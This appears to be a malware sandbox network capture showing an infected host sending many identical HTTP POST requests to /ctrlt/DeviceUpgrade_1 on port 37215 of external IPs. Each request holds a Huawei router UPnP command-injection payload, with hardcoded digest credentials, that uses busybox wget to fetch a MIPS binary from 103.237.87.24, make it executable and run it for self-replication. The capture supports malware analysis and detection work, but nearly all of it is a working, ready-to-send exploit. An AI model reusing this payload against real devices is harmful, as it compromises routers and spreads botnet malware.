                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1413192.168.2.134081441.115.68.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482817888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1414192.168.2.1340628197.75.188.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482825994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1415192.168.2.135251041.115.171.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482904911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1416192.168.2.1333584157.205.75.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482908010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1417192.168.2.135231441.141.130.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482924938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1418192.168.2.1336688181.122.111.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482935905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1419192.168.2.1340022157.185.26.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482952118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1420192.168.2.1352458197.173.253.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482954979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1421192.168.2.134547012.114.114.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483437061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1422192.168.2.1356610197.237.244.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.483447075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 